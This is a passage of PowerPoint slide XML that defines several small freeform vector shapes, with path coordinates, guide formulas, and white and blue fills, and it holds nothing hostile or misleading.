          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10348" name="Freeform 429"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1676400" y="7108825"/>
            <a:ext cx="31750" cy="30163"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T27" fmla="*/ 0 h 13"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T29" fmla="*/ 0 h 13"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T31" fmla="*/ 0 h 13"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T33" fmla="*/ 0 h 13"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T35" fmla="*/ 0 h 13"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T37" fmla="*/ 0 h 13"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T39" fmla="*/ 0 h 13"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T46" fmla="*/ 0 w 14"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T48" fmla="*/ 0 w 14"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T50" fmla="*/ 0 w 14"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 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
              <a:gd name="T100" fmla="*/ 0 h 13"/>
              <a:gd name="T101" fmla="*/ 14 w 14"/>
              <a:gd name="T102" fmla="*/ 13 h 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 h="13">
                <a:moveTo>
                  <a:pt x="7" y="13"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="13"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10349" name="Freeform 430"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1584325" y="7108825"/>
            <a:ext cx="15875" cy="15875"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T15" fmla="*/ 0 h 7"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T17" fmla="*/ 0 h 7"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T19" fmla="*/ 0 h 7"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T22" fmla="*/ 0 w 7"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T24" fmla="*/ 0 w 7"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T26" fmla="*/ 0 w 7"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T33" fmla="*/ 214748364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7"/>
              <a:gd name="T53" fmla="*/ 7 w 7"/>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7">
                <a:moveTo>
                  <a:pt x="3" y="7"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="7"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10350" name="Freeform 431"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1611312" y="7108825"/>
            <a:ext cx="11113" cy="15875"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T15" fmla="*/ 0 h 7"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T17" fmla="*/ 0 h 7"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T19" fmla="*/ 0 h 7"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T22" fmla="*/ 0 w 5"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T24" fmla="*/ 0 w 5"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T26" fmla="*/ 0 w 5"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T33" fmla="*/ 214748364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7"/>
              <a:gd name="T53" fmla="*/ 5 w 5"/>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7">
                <a:moveTo>
                  <a:pt x="3" y="7"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="7"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10351" name="Freeform 432"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1506537" y="6900863"/>
            <a:ext cx="42863" cy="207962"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T10" fmla="*/ 0 w 19"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T12" fmla="*/ 0 w 19"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T37" fmla="*/ 0 h 92"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T39" fmla="*/ 0 h 92"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T41" fmla="*/ 0 h 92"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T43" fmla="*/ 0 h 92"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T45" fmla="*/ 0 h 92"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T47" fmla="*/ 0 h 92"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T49" fmla="*/ 0 h 92"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T51" fmla="*/ 2147483647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
              <a:gd name="T79" fmla="*/ 0 h 92"/>
              <a:gd name="T80" fmla="*/ 19 w 19"/>
              <a:gd name="T81" fmla="*/ 92 h 9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 h="92">
                <a:moveTo>
                  <a:pt x="6" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="92"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="91"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="3F9EFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10352" name="Freeform 433"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1728787" y="6873875"/>
            <a:ext cx="60325" cy="233363"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T1" fmla="*/ 0 h 103"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 103"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 103"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 103"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 103"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 103"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 103"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 103"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 103"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 103"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 103"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 103"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 103"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 103"/>
              <a:gd name="T28" fmla="*/ 0 w 27"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 103"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 103"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 103"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T35" fmla="*/ 0 h 103"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 27"/>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103"/>
              <a:gd name="T59" fmla="*/ 27 w 27"/>
              <a:gd name="T60" fmla="*/ 103 h 10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103">
                <a:moveTo>
                  <a:pt x="27" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="26" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="91"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="3F9EFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10353" name="Freeform 434"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1506537" y="6911975"/>
            <a:ext cx="41275" cy="180975"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T10" fmla="*/ 0 w 18"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 18"/>
